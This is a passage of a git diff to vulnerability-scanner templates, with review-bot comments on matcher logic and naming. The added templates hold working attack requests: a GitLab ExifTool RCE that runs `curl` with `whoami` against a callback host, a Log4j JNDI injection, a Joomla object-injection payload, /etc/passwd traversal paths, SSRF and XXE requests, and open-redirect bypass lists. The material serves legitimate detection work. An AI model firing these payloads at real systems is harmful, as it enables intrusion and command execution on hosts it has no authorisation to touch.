'{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=examp
le.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' - - '{{BaseURL}}/1/_https@example.com' + payloads: + redirect: + - '%0a/example.com/' + - '%0d/example.com/' + - '%00/example.com/' + - '%09/example.com/' + - '%5C%5Cexample.com/%252e%252e%252f' + - '%5Cexample.com' + - '%5cexample.com/%2f%2e%2e' + - '%5c{{RootURL}}example.com/%2f%2e%2e' + - '../example.com' + - '.example.com' + - '/%5cexample.com' + - '////\;@example.com' + - '////example.com' + - '///example.com' + - '///example.com/%2f%2e%2e' + - '///example.com@//' + - '///{{RootURL}}example.com/%2f%2e%2e' + - '//;@example.com' + - '//\/example.com/' + - '//\@example.com' + - '//\example.com' + - '//\texample.com/' + - '//example.com/%2F..' + - '//example.com//' + - '//example.com@//' + - '//example.com\texample.com/' + - '//https://example.com@//' + - '/<>//example.com' + - '/\/\/example.com/' + - '/\/example.com' + - '/\example.com' + - '/example.com' + - '/example.com/%2F..' 
+ - '/example.com/' + - '/example.com/..;/css' + - '/https:example.com' + - '/{{RootURL}}example.com/' + - '/〱example.com' + - '/〵example.com' + - '/ゝexample.com' + - '/ーexample.com' + - '/ーexample.com' + - '<>//example.com' + - '@example.com' + - '@https://example.com' + - '\/\/example.com/' + - 'example%E3%80%82com' + - 'example.com' + - 'example.com/' + - 'example.com//' + - 'example.com;@' + - 'https%3a%2f%2fexample.com%2f' + - 'https:%0a%0dexample.com' + - 'https://%0a%0dexample.com' + - 'https://%09/example.com' + - 'https://%2f%2f.example.com/' + - 'https://%3F.example.com/' + - 'https://%5c%5c.example.com/' + - 'https://%5cexample.com@' + - 'https://%23.example.com/' + - 'https://.example.com' + - 'https://////example.com' + - 'https:///example.com' + - 'https:///example.com/%2e%2e' + - 'https:///example.com/%2f%2e%2e' + - 'https:///example.com@example.com/%2e%2e' + - 'https:///example.com@example.com/%2f%2e%2e' + - 'https://:80#@example.com/' + - 'https://:80?@example.com/' + - 'https://:@\@example.com' + - 'https://:@example.com\@example.com' + - 'https://:@example.com\@WillBeReplaced.com' + - 'https://;@example.com' + - 'https://\texample.com/' + - 'https://example.com/example.com' + - 'https://example.com/https://example.com/' + - 'https://www.\.example.com' + - 'https:/\/\example.com' + - 'https:/\example.com' + - 'https:/example.com' + - 'https:example.com' + - '{{RootURL}}example.com' + - '〱example.com' + - '〵example.com' + - 'ゝexample.com' + - 'ーexample.com' + - 'ーexample.com' + - 
'?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' stop-at-first-match: true matchers-condition: and matchers: + - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: - - 302 - 301 + - 302 + - 307 + - 308 + condition: or \ No newline at end of file 
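Review bot: The payload `https://:@example.com\@WillBeReplaced.com` looks like an unsubstituted placeholder — its neighbour `https://:@example.com\@example.com` is the same userinfo trick with the literal host, and everywhere else in the new list the target host is written as `{{RootURL}}` — so presumably it was meant to read `https://:@example.com\@{{Hostname}}`; as committed it just sends a fixed third-party domain. `/ーexample.com` and `ーexample.com` also each appear twice; if those are two different look-alike code points a short comment saying so would stop the next cleanup from deleting one, otherwise one copy is dead weight. Since the request is a raw `GET /{{redirect}}`, payloads such as `../example.com` and `//\example.com` depend on the client not normalising the path before sending; if a run shows them being rewritten, `unsafe: true` keeps them byte-exact.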
diff --git a/vulnerabilities/generic/request-based-interaction.yaml b/vulnerabilities/generic/request-based-interaction.yaml
index dfa1de5d96..090f0108cf 100644
--- a/vulnerabilities/generic/request-based-interaction.yaml
+++ b/vulnerabilities/generic/request-based-interaction.yaml
@@ -5,7 +5,8 @@ info:
author: pdteam
severity: info
description: The remote server fetched a spoofed DNS Name from the request.
- reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
+ reference:
+ - https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
tags: oast,ssrf,generic
requests:
diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml
index f6cc199b5c..a9c7860d7b 100644
--- a/vulnerabilities/generic/top-xss-params.yaml
+++ b/vulnerabilities/generic/top-xss-params.yaml
@@ -5,9 +5,9 @@ info:
author: foulenzer,geeknik
severity: medium
description: Searches for reflected XSS in the server response via GET-requests.
- tags: xss,generic
metadata:
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p,month,page_id,password,terms,token,type,unsubscribe_token,api,api_key,begindate,callback,categoryid,csrf_token,email,emailto,enddate,immagine,item,jsonp,l,lang,list_type,year
+ tags: xss,generic
requests:
- method: GET
diff --git a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml
index 8e99a56920..7d42755be4 100644
--- a/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml
+++ b/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml
@@ -3,9 +3,10 @@ id: xmlrpc-pingback-ssrf
info:
name: XMLRPC Pingback SSRF
author: geeknik
- reference: https://hackerone.com/reports/406387
severity: high
- tags: ssrf,generic
+ reference:
+ - https://hackerone.com/reports/406387
+ tags: ssrf,generic,xmlrpc
requests:
- raw:
diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml new file mode 100644 index 0000000000..dade1377d0 --- /dev/null +++ b/vulnerabilities/gitlab/gitlab-rce.yaml 
@@ -0,0 +1,64 @@ +id: gitlab-rce + +info: + name: GitLab CE/EE Unauthenticated RCE Using ExifTool + author: pdteam + severity: critical + description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and + 13.10-13.10.2. + reference: + - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ + - https://hackerone.com/reports/1154542 + - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2021-22205 + cwe-id: CWE-20 + remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher. + metadata: + shodan-query: http.title:"GitLab" + tags: cve,cve2021,gitlab,rce,oast,intrusive + +requests: + - raw: + - | + GET /users/sign_in HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /uploads/user HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5 + X-CSRF-Token: {{csrf-token}} + + {{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl 
`whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}} + + cookie-reuse: true + max-redirects: 3 + matchers-condition: and + matchers: + - type: word + words: + - 'Failed to process image' + + - type: status + status: + - 422 + + extractors: + - type: regex + name: csrf-token + internal: true + group: 1 + regex: + - 'csrf-token" content="(.*?)" />' + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)' + +# Enhanced by CS 2021/03/04 diff --git a/vulnerabilities/httpbin/httpbin-open-redirect.yaml b/vulnerabilities/httpbin/httpbin-open-redirect.yaml new file mode 100644 index 0000000000..08aff96109 --- /dev/null +++ b/vulnerabilities/httpbin/httpbin-open-redirect.yaml 
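Review bot: The `and` matcher set at the end of the gitlab-rce hunk requires only the 422 status and the `Failed to process image` string; the interactsh callback that carries the `whoami` output feeds an extractor only, so it never gates the verdict. A host that rejects the crafted DjVu with that same error without executing anything would still be reported as critical, whereas adding `- type: word`, `part: interactsh_protocol` and `words: ["dns"]` to the matcher list ties the result to the out-of-band DNS interaction the `oast` tag already promises. The description also misspells `vulnreability`. Since the payload runs `curl` with `whoami` on the target, a one-line comment above the second raw request stating that command execution occurs would help anyone triaging why the template is tagged `intrusive`.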
@@ -0,0 +1,28 @@ +id: httpbin-open-redirect + +info: + name: HTTPBin - Open Redirect + author: Adam Crosser + severity: low + reference: + - https://github.com/postmanlabs/httpbin + metadata: + shodan-query: + - html:"https://github.com/requests/httpbin" + - title:"httpbin.org" + tags: redirect,httpbin,oss + +requests: + - method: GET + path: + - "{{BaseURL}}/redirect-to?url=https%3A%2F%2Fexample.com" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'location == "https://example.com"' + + - type: status + status: + - 302 \ No newline at end of file diff --git a/vulnerabilities/httpbin/httpbin-xss.yaml b/vulnerabilities/httpbin/httpbin-xss.yaml new file mode 100644 index 0000000000..e384b8cb83 --- /dev/null +++ b/vulnerabilities/httpbin/httpbin-xss.yaml @@ -0,0 +1,34 @@ +id: httpbin-xss + +info: + name: HTTPBin - Cross Site Scripting + author: Adam Crosser + severity: medium + reference: + - https://github.com/postmanlabs/httpbin + metadata: + shodan-query: + - html:"https://github.com/requests/httpbin" + - title:"httpbin.org" + tags: xss,httpbin,oss + +requests: + - method: GET + path: + - '{{BaseURL}}/base64/PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+' + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '^$' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/huawei/huawei-hg255s-lfi.yaml b/vulnerabilities/huawei/huawei-hg255s-lfi.yaml new file mode 100644 index 0000000000..71a0d509f3 --- /dev/null +++ b/vulnerabilities/huawei/huawei-hg255s-lfi.yaml 
@@ -0,0 +1,27 @@ +id: huawei-hg255s-lfi + +info: + name: Huawei HG255s - Directory Traversal + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2017090053 + - https://www.youtube.com/watch?v=n02toTFkLOU + metadata: + shodan-query: http.html:"HG532e" + tags: huawei,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/ibm/ibm-infoprint-lfi.yaml b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml index 5945201731..899fad8ae8 100644 --- a/vulnerabilities/ibm/ibm-infoprint-lfi.yaml +++ b/vulnerabilities/ibm/ibm-infoprint-lfi.yaml @@ -5,8 +5,9 @@ info: author: harshbothra_ severity: medium description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. - reference: https://www.exploit-db.com/exploits/47835 - tags: ibm,lfi + reference: + - https://www.exploit-db.com/exploits/47835 + tags: ibm,lfi,matrix,printer requests: - method: GET @@ -19,5 +20,5 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body diff --git a/vulnerabilities/ibm/ibm-websphere-ssrf.yaml b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml new file mode 100644 index 0000000000..777b9a5e06 --- /dev/null +++ b/vulnerabilities/ibm/ibm-websphere-ssrf.yaml 
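Review bot: The `shodan-query` in the huawei-hg255s-lfi hunk searches for `HG532e`, while the id, name and references describe the HG255s, so discovery targets a different router model than the traversal path was written for. If the traversal is known to affect both models the name and tags should say so; otherwise the query should identify the HG255s (I cannot confirm that model's banner string from here, so it needs checking against real devices). The body regex `root:[x*]:0:0` also accepts a partial hit inside unrelated text; the ibm-infoprint-lfi change in this same commit tightens its pattern to `root:.*:0:0:`, and using `root:[x*]:0:0:` here keeps the two LFI templates consistent.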
@@ -0,0 +1,29 @@ +id: ibm-websphere-ssrf + +info: + name: IBM WebSphere Portal SSRF + author: pdteam + severity: high + reference: + - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ + tags: ibm,ssrf,websphere + +requests: + - method: GET + path: + - '{{BaseURL}}/docpicker/internal_proxy/http/example.com' + - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/example.com' + + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "Example Domain" \ No newline at end of file diff --git a/vulnerabilities/jamf/jamf-blind-xxe.yaml b/vulnerabilities/jamf/jamf-blind-xxe.yaml new file mode 100644 index 0000000000..4cdb45f7d2 --- /dev/null +++ b/vulnerabilities/jamf/jamf-blind-xxe.yaml @@ -0,0 +1,51 @@ +id: jamf-blind-xxe + +info: + name: JAMF Blind XXE / SSRF + author: pdteam + severity: medium + reference: + - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ + tags: xxe,ssrf,jamf + +requests: + - raw: + - | + POST /client HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + + + &test; + + + com.jamfsoftware.jamfdistributionserver + {{unix_time()}} + + 00000000-0000-0000-0000-000000000000 + com.jamfsoftware.jamf.distributionserverinventoryrequest + + 1999 + {{unix_time()}} + + + + 34 + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "http" + + - type: word + words: + - "com.jamfsoftware.jss" \ No newline at end of file diff --git a/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..b3dc039870 --- /dev/null +++ b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml 
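Review bot: In the jamf-blind-xxe matchers the `interactsh_protocol` word is `http` but the inline comment says `# Confirms the DNS Interaction`, so one of the two is wrong. If the external entity is expected to be fetched over HTTP, `http` is the stronger signal and the comment should read `# Confirms the HTTP interaction`; if only name resolution is expected from a blind XXE behind egress filtering, the word should be `dns`, as the sibling jamf-log4j-jndi-rce template in this change uses. The XML body is not legible in this view, so I cannot verify that the `&test;` entity actually points at `{{interactsh-url}}`; that should be confirmed before merge. Because the second matcher on `com.jamfsoftware.jss` is joined with `and`, a target that fetches the entity but returns a different body is silently missed — worth a comment stating that this combination is intentional.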
@@ -0,0 +1,39 @@ +id: jamf-log4j-jndi-rce + +info: + name: JAMF Log4j JNDI RCE + author: pdteam + severity: critical + reference: + - https://github.com/random-robbie/jamf-log4j + tags: rce,jndi,log4j,jamf + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/vulnerabilities/jenkins/jenkins-asyncpeople.yaml b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml index 41dc0e1204..0c9a499eef 100644 --- a/vulnerabilities/jenkins/jenkins-asyncpeople.yaml +++ b/vulnerabilities/jenkins/jenkins-asyncpeople.yaml @@ -4,12 +4,12 @@ info: name: Jenkins panel async-people author: nadino severity: info - tags: jenkins reference: - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 - https://issues.jenkins.io/browse/JENKINS-30107 - https://issues.jenkins.io/browse/JENKINS-18884 - https://issues.jenkins.io/browse/JENKINS-26469 + tags: jenkins requests: - method: GET diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml index b9355903ef..aa73329709 100644 --- a/vulnerabilities/jenkins/jenkins-script.yaml +++ b/vulnerabilities/jenkins/jenkins-script.yaml 
@@ -4,8 +4,10 @@ info: name: Jenkins RCE due to accessible script functionality author: philippedelteil severity: critical - reference: https://hackerone.com/reports/403402 + reference: + - https://hackerone.com/reports/403402 tags: jenkins,rce,devops + requests: - method: GET path: diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 5807e86979..88cea915bc 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -5,7 +5,8 @@ info: author: Dheerajmadhukar severity: low description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. - reference: https://hackerone.com/reports/221833 + reference: + - https://hackerone.com/reports/221833 tags: jenkins requests: diff --git a/vulnerabilities/jira/jira-service-desk-signup.yaml b/vulnerabilities/jira/jira-service-desk-signup.yaml index dd1c371355..1cfce39b45 100644 --- a/vulnerabilities/jira/jira-service-desk-signup.yaml +++ b/vulnerabilities/jira/jira-service-desk-signup.yaml @@ -4,7 +4,7 @@ info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium - tags: jira,atlassian + tags: jira,atlassian,service requests: - method: POST diff --git a/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml b/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml index 4824bb950c..ff6dcd5d49 100644 --- a/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml @@ -6,7 +6,6 @@ info: severity: info tags: atlassian,jira - requests: - method: GET path: diff --git a/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/vulnerabilities/jira/jira-unauthenticated-screens.yaml index 7055da97cb..11433c0ba1 100644 --- a/vulnerabilities/jira/jira-unauthenticated-screens.yaml 
+++ b/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -4,7 +4,8 @@ info: name: Jira Unauthenticated Access to screens author: TESS severity: info - reference: https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get + reference: + - https://developer.atlassian.com/cloud/jira/platform/rest/v2/api-group-screens/#api-rest-api-2-screens-get tags: atlassian,jira requests: diff --git a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index 0336b5eaa4..41eb4ecdcf 100644 --- a/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Jolokia Java Heap Information Disclosure author: milo2012 severity: info - tags: jolokia,disclosure + tags: jolokia,disclosure,java requests: - raw: diff --git a/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml b/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml new file mode 100644 index 0000000000..ffae9984d2 --- /dev/null +++ b/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml 
@@ -0,0 +1,30 @@ +id: joomla-jvehicles-lfi + +info: + name: Joomla! Component com_sef - Local File Inclusion + author: daffainfo + severity: high + description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php. + reference: + - https://www.exploit-db.com/exploits/11997 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + remediation: Upgrade to a supported version. + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + - type: status + status: + - 200 + +# Enhanced by cs on 2022/03/25 diff --git a/vulnerabilities/joomla/rusty-joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml new file mode 100644 index 0000000000..662a4d5b87 --- /dev/null +++ b/vulnerabilities/joomla/rusty-joomla.yaml 
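Review bot: The `name` in the joomla-jvehicles-lfi hunk reads `Joomla! Component com_sef - Local File Inclusion`, but the id, description and request all target `com_jvehicles`, so findings would be attributed to the wrong extension; it should be `Joomla! Component com_jvehicles - Local File Inclusion`. The template is tagged `cve,cve2010` yet `classification` carries no `cve-id`, which leaves the tags unverifiable — either add the identifier given in the referenced exploit-db entry (I cannot confirm it from here) or drop the two tags. `remediation: Upgrade to a supported version.` is also hard to act on for an old third-party component; saying that the extension should be removed if no fixed release exists would be more useful.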
@@ -0,0 +1,43 @@ +id: rusty-joomla + +info: + name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS + author: leovalcante,kiks7 + severity: critical + description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution. + reference: + - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ + - https://github.com/kiks7/rusty_joomla_rce + tags: joomla,rce,unauth,php,cms,objectinjection + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + + redirects: true + max-redirects: 2 + cookie-reuse: true + extractors: + - type: regex + name: csrf + part: body + internal: true + group: 1 + regex: + - "" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Undefined index: --> in file" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 500 
diff --git a/technologies/linkerd-service-detect.yaml b/vulnerabilities/linkerd/linkerd-ssrf.yaml similarity index 83% rename from technologies/linkerd-service-detect.yaml rename to vulnerabilities/linkerd/linkerd-ssrf.yaml index 3060e058eb..ec72073405 100644 --- a/technologies/linkerd-service-detect.yaml +++ b/vulnerabilities/linkerd/linkerd-ssrf.yaml @@ -4,8 +4,9 @@ info: name: Linkerd Service detection author: dudez severity: info - tags: tech,linkerd - reference: https://twitter.com/nirvana_msu/status/1084144955034165248 + reference: + - https://twitter.com/nirvana_msu/status/1084144955034165248 + tags: tech,linkerd,service requests: - method: GET @@ -29,4 +30,4 @@ requests: - '(?mi)Exceeded .*? binding timeout while resolving name' - '(?mi)exceeded .*? to unspecified while dyn binding' part: body - condition: or \ No newline at end of file + condition: or diff --git a/vulnerabilities/magento/magento-2-exposed-api.yaml b/vulnerabilities/magento/magento-2-exposed-api.yaml index a13b74936b..57e53632c6 100644 --- a/vulnerabilities/magento/magento-2-exposed-api.yaml +++ b/vulnerabilities/magento/magento-2-exposed-api.yaml @@ -5,7 +5,8 @@ info: author: TechbrunchFR severity: info description: The API in Magento 2 can be accessed by the world without providing credentials. Through the API information like storefront, (hidden) products including prices are exposed. - reference: https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api + reference: + - https://support.hypernode.com/en/ecommerce/magento-2/how-to-protect-the-magento-2-api tags: magento requests: diff --git a/vulnerabilities/magento/magento-cacheleak.yaml b/vulnerabilities/magento/magento-cacheleak.yaml index 56981148e9..f33789b6ce 100644 --- a/vulnerabilities/magento/magento-cacheleak.yaml +++ b/vulnerabilities/magento/magento-cacheleak.yaml 
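Review bot: The file is moved from `technologies/linkerd-service-detect.yaml` to `vulnerabilities/linkerd/linkerd-ssrf.yaml`, yet the new side keeps `name: Linkerd Service detection`, `severity: info` and `tags: tech,linkerd,service` — nothing in the template now mentions SSRF. Either the move is wrong and a fingerprint belongs under technologies/, or the id, name, severity and tags should describe the SSRF the new path claims, e.g. `tags: linkerd,ssrf` with a severity above info and a `description` of which request provokes the resolver errors the body matchers look for. As written, a hit is reported as an informational detection living under a vulnerabilities path, which misleads triage and any tooling that keys severity off the directory.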
@@ -4,7 +4,9 @@ info: name: Magento Cacheleak author: TechbrunchFR severity: high - description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files. + description: Magento Cacheleak is an implementation vulnerability, result of bad implementation of web-server configuration for Magento platform. Magento was developed to work under the Apache web-server which + natively works with .htaccess files, so all needed configuration directives specific for various internal Magento folders were placed in .htaccess files. When Magento is installed on web servers that are ignoring + .htaccess files (such as nginx), an attacker can get access to internal Magento folders (such as the Magento cache directory) and extract sensitive information from cache files. reference: - https://support.hypernode.com/en/best-practices/security/how-to-secure-magento-cacheleak - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/ diff --git a/vulnerabilities/magento/magento-unprotected-dev-files.yaml b/vulnerabilities/magento/magento-unprotected-dev-files.yaml index 7f7d1c2c47..9551d09981 100644 --- a/vulnerabilities/magento/magento-unprotected-dev-files.yaml +++ b/vulnerabilities/magento/magento-unprotected-dev-files.yaml 
